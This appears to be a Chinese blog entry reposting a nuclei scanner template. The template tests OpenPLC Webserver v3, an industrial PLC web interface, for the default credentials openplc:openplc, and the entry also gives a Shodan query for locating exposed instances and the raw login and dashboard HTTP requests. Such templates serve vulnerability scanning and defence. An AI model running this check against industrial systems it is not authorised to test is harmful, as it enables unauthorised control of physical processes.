OpenPLC Webserver v3 Default Login Vulnerability

漏洞信息

漏洞名称: OpenPLC Webserver v3 Default Login Vulnerability

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: OpenPLC Webserver v3是一款用于工业控制系统(ICS)的开源可编程逻辑控制器(PLC)软件,广泛应用于工业自动化领域。该软件的Web界面默认使用用户名和密码均为’openplc’的凭证进行认证,这一弱口令漏洞使得攻击者能够轻易获得未授权访问权限。漏洞的技术根源在于系统出厂时未强制修改默认凭证,导致任何知道默认凭证的用户都能登录系统。这种漏洞的存在可能导致攻击者完全控制PLC系统,进而对工业控制系统造成严重影响,包括但不限于远程代码执行、数据泄露、服务中断等。由于该漏洞不需要任何认证即可利用,且攻击过程可以自动化,因此对工业控制系统构成了严重的安全威胁。

产品厂商: OpenPLC

产品名称: OpenPLC Webserver

影响版本: v3

搜索语法: html:”alt=”OpenPLC””

来源: https://github.com/projectdiscovery/nuclei-templates/blob/5fc012a7075245b167e00316d026bbaeccd9ad2f/http%2Fdefault-logins%2Fopenplc%2Fopenplc-default-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

id: openplc-default-login

info:
name: OpenPLC Webserver v3 - Default Login
author: machevalia
severity: high
description: |
Identifies default credentials (openplc:openplc) on OpenPLC Webserver v3, allowing unauthorized access to the web interface.
metadata:
shodan-query: html:"alt="OpenPLC""
verified: true
max-request: 2
tags: openplc,default-login,iot

variables:
username: "openplc"
password: "openplc"

http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

username={{username}}&password={{password}}

- |
GET /dashboard HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: word
part: body
words:
- "Dashboard"
- "Runtime Logs"
condition: and

- type: status
status:
- 200



OpenPLC Webserver v3 Default Login Vulnerability
http://example.com/2025/07/08/github_3499782428/
作者
lianccc
发布于
2025年7月8日
许可协议